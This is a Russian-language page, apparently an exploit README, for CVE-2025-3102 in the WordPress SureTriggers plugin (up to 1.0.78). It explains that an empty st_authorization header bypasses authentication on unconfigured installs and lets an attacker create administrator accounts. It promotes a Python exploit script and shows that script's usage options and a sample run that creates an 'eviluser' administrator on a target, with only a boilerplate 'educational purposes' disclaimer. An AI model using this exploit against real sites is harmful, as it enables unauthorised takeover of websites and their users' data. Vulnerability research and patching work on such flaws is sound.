
Wordpress SureTriggers <= 1.0.78 — Обход авторизации из-за отсутствия проверки пустого значения для создания неаутентифицированного административного пользователя
🚨 CVE-2025-3102 — это критическая уязвимость обхода аутентификации, затрагивающая плагин WordPress SureTriggers: All-in-One Automation Platform, который активно установлен на более чем 100 000 сайтах. Из-за характера проблемы и масштаба развертывания эта уязвимость представляет собой значительный риск безопасности.
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:HПлагин SureTriggers для WordPress уязвим к обходу аутентификации, что позволяет неаутентифицированным злоумышленникам создавать учетные записи администратора. Это связано с отсутствием проверки пустого значения для secret_key внутри функции autheticate_user.
Когда плагин установлен и активирован, но не настроен с API-ключом, злоумышленники могут обойти аутентификацию, отправив пустой заголовок st_authorization, что вызовет действия, зарезервированные для аутентифицированных пользователей.
Предоставляется скрипт на Python для автоматизации эксплуатации этой уязвимости.
Этот скрипт позволяет создать нового пользователя-администратора на уязвимых сайтах.
readme.txtst_authorizationusage: CVE-2025-3102.py [-h] -u URL [-nmail NEWMAIL] [-nu NEWUSER] [-np NEWPASSWORD]
SureTriggers <= 1.0.78 - Authorization Bypass Exploit
By: Nxploited | Khaled Alenazi
options:
-h, --help Show this help message and exit
-u, --url URL Target WordPress base URL
-nmail, --newmail NEWMAIL Email to register
-nu, --newuser NEWUSER Username to register
-np, --newpassword NEWPASSWORD Password for the new user
[+] Detected plugin version: 1.0.78
[+] Vulnerable version detected. Proceeding...
[*] Exploiting the target in 3 seconds...
[+] Email generated: [email protected]
[+] Username generated: eviluser
[+] Password generated: P@ssw0rd123!
[+] Exploit Successful!
[+] Login credentials: eviluser:P@ssw0rd123!
Этот скрипт предоставляется только в образовательных целях.
Несанкционированное использование этого кода против целей без явного разрешения незаконно.
Автор не несет ответственности за любое неправомерное использование или причиненный ущерб.
Автор: Nxploited ( Khaled Alenazi )